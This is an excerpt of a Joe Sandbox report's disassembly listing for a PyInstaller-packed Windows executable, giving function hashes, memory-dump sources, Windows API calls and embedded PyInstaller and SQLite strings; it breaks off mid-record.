                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8882c5eb4bd230fe5bcbe8ede7195bf55261286b9ff7d48f2077dfc522faf57c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F01254B0DB1682FE5997AD98552B552965F88B40FAC47B0CF0FC63D1ED1CE4814310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a76ebb8b56715d3b0a8619898a499cd377501ef68b861c955d3a7ca792ad6ab4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9F03C22B08B8185E3099B26F8106AAB264FB85FC4F584075EE9D47BEECE3CD5468700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6BA3B0C90,?,?,?,00007FF6BA3B22FA,?,?,?,?,?,00007FF6BA3B3AE9), ref: 00007FF6BA3BD63A
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 740c7bfd3d3b2ec6e199cfb04274249a64034ef9177ba3c6e438c5b73f8f8ddd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF0F810F19B4745FEA85B7A58517B912925FC47E0FC807B0DF2EC62C2EE3CA4808720
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c185ad2ac7251cea98abc6702faec32d401d285ff3d3618ac024875ed806b77b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22D13E32A08B9286EB109F78E8542AD77A5FF84B58F404275EF5ED3AA4EF3CD5458700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-1067337024
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea5b30896b8f601e2c558708f0cff121e52ec114d766bdc7e5f30d61455f35fa
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bf942c08fc59c41225fc3e824fdad7f47097ea268e2be274e996794ee0269138
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea5b30896b8f601e2c558708f0cff121e52ec114d766bdc7e5f30d61455f35fa
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E020363F0EA8345FB758B149070B796A91BB52B9CF14C236CA7E436E9DE3DE4618700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-509082904
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2656ad0c0fd7523b4c1cb6d6ccb6ebaef910a3cd00626bca7a02776590651dc9
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7ebe671b38e2cd385e2f76cca52bad9a6f268fe8076b13b782b9c863ebef73ca
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2656ad0c0fd7523b4c1cb6d6ccb6ebaef910a3cd00626bca7a02776590651dc9
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0112A062F0AA4B85EB548F65A4A0B7967A0FF45B88F584131DE6D476FCEF3CE4858300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13341ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1592948245-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b9ef4eb9ea32c52a24f5b3f15222a33d19c07a46ba9964f95c47229b9e726e2b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02313E72708B8186EB648F61E8517EA7374FB44744F80407ADB6E87B98DF38D588C710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A842B
                                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84AE
                                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84CD
                                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84DB
                                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84EC
                                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84F5
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d097f9422ff17ccd52add64778dbe7a2ad092627c8b647c71697cb2f7b283298
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3416521A0CA6685EE709F68E4491BE6362FB94755F400272EF9DC36D4EF3CD545C740
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2031831958
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8394c9a233799e7e54f9d67e0ba715d190cc7eefee7a017f120b9e4635b32898
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCD124A2B1E68386DB248B249064F7D7B95FB56784F4A4035DE6E437E9DF2CE800E700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b145c5f2a5afa8f64978e50b9800baffaf378b23a07dbfb77271a805afecb553
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E313C72709A8186EB648F60E8507ED73A0FB88744F84447ADA6E47B99DF3CD548C710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2a263cee899eb05c8893552b5cfa0bc6d4b8e3c0ba065ec74635e73e455b4807
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53313E72A08B918AEB609F64E8803EE7365FB84744F44407ADB4E87B98EF3CD548C710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5C45
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA909
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA92E
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5C34
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
                                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f298a274bc8e03f4046c82add987d87bd82ab5ba2314ab19afe7e84179069e03
